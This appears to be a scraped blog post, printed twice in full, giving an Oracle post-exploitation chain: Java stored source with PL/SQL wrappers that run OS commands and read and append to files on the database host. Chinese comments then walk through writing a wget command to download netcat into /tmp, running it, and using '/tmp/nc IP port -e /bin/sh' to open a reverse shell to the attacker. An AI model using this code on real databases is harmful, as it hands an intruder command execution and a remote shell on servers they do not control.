create or replace and compile java source named oraexec as
import java.lang.*;
import java.io.*;
public class oraexec {
private static void copyStream(InputStream inputStream, OutputStream outStream,String type) throws IOException {
byte[] bytes = new byte[1024];
int len = 0;
System.out.println("========"+type+"========");
while ( (len = inputStream.read(bytes)) != -1)
{
System.out.println(new String(bytes,0,len));
outStream.write(bytes,0,len);
}
}
/*
* Command execution module
*/
public static void execCommand(String command) throws IOException {
Process pc = Runtime.getRuntime().exec(command);
copyStream(pc.getInputStream(), System.out,"InputStream()");
copyStream(pc.getErrorStream(), System.out,"ErrorStream()");
}
/*
* File reading module
*/
public static void readFile(String filename) throws IOException {
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}
/*
* File writing module
*/
public static void writeFile(String filename, String line) throws IOException {
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}
============================================
CODE_2:
-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';
===========================================
CODE_3:
-- usage: exec dbms_java.set_output(2000);
-- set serveroutput on;
-- exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
============================================
CODE_4:
-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
4、
exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc'); //写入wget nc 命令到文件getnc
exec dbms_java.set_output(2000); //设置javareadfile
set serveroutput on;
exec javareadfile('/tmp/getnc'); //读取文件查看是否写入成功
exec javacmd('/bin/sh /tmp/getnc'); //执行命令下载nc
exec javareadfile('/tmp/nc'); //查看nc是否下载成功
exec javawritefile('/tmp/shell', '/tmp/nc IP port -e /bin/sh'); //写入反弹命令
exec javareadfile('/tmp/shell'); //读取文件查看是否写入成功
exec javacmd('/bin/sh /tmp/shell'); //执行nc反弹shell,在本地nc监听就能得到shell,如果不行,请确认防火墙
import java.lang.*;
import java.io.*;
public class oraexec {
private static void copyStream(InputStream inputStream, OutputStream outStream,String type) throws IOException {
byte[] bytes = new byte[1024];
int len = 0;
System.out.println("========"+type+"========");
while ( (len = inputStream.read(bytes)) != -1)
{
System.out.println(new String(bytes,0,len));
outStream.write(bytes,0,len);
}
}
/*
* Command execution module
*/
public static void execCommand(String command) throws IOException {
Process pc = Runtime.getRuntime().exec(command);
copyStream(pc.getInputStream(), System.out,"InputStream()");
copyStream(pc.getErrorStream(), System.out,"ErrorStream()");
}
/*
* File reading module
*/
public static void readFile(String filename) throws IOException {
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}
/*
* File writing module
*/
public static void writeFile(String filename, String line) throws IOException {
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}
============================================
CODE_2:
-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';
===========================================
CODE_3:
-- usage: exec dbms_java.set_output(2000);
-- set serveroutput on;
-- exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
============================================
CODE_4:
-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
4、
exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc'); //写入wget nc 命令到文件getnc
exec dbms_java.set_output(2000); //设置javareadfile
set serveroutput on;
exec javareadfile('/tmp/getnc'); //读取文件查看是否写入成功
exec javacmd('/bin/sh /tmp/getnc'); //执行命令下载nc
exec javareadfile('/tmp/nc'); //查看nc是否下载成功
exec javawritefile('/tmp/shell', '/tmp/nc IP port -e /bin/sh'); //写入反弹命令
exec javareadfile('/tmp/shell'); //读取文件查看是否写入成功
exec javacmd('/bin/sh /tmp/shell'); //执行nc反弹shell,在本地nc监听就能得到shell,如果不行,请确认防火墙
扫一扫
783
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
